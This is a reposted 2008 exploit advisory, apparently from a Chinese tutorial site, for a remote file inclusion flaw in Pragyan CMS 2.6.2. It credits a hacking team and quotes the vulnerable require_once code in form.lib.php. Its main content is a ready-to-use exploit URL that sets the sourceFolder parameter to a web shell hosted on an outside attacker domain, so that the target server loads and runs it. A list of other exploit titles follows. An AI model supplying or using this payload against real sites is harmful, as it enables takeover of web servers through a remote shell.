手机
当前位置:查字典教程网 >网络安全 >Exploit >Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
摘要:--------------------------------------------------------------[Persian...

<< In The Name Of GOD >>

-------------------------------------------------------------

- [ Persian Boys Hacking Team ] -:- 2008

-

- discovered by N3TR00T3R [at] Y! [dot] com

- pragyan 2.6.2 Remote File Includion

- download :http://sourceforge.net/project/showfiles.php?group_id=220286

- sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd

r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser

Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...

[www.Persian-Boys.com] & [www.irchatan.com]

--------------------------------------------------------------

if register_globals = On;

Vul Code : [/cms/modules/form.lib.php]

##########################################################

#global $sourceFolder;

#global $moduleFolder;

#require_once("$sourceFolder/$moduleFolder/form/editform.php");

#require_once("$sourceFolder/$moduleFolder/form/editformelement.php");

#require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");

#require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");

#require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");

##########################################################

Exploit :

##########################################################

#

# www.target.com/path/cms/modules/form.lib.php?sourceFolder=http://shell.own3r.by.ru/syn99.php?

#

##########################################################

【Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability】相关文章:

Joomla Component DT Register Remote SQL injection Vulnerability

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

Maian Cart 1.1 Insecure Cookie Handling Vulnerability

Maian Greetings 2.1 Insecure Cookie Handling Vulnerability

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

Joomla Component EZ Store Remote Blind SQL Injection Exploit

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

LoveCMS 1.6.2 Final Remote Code Execution Exploit

上一篇: Comdev Web Blogger
精品推荐
分类导航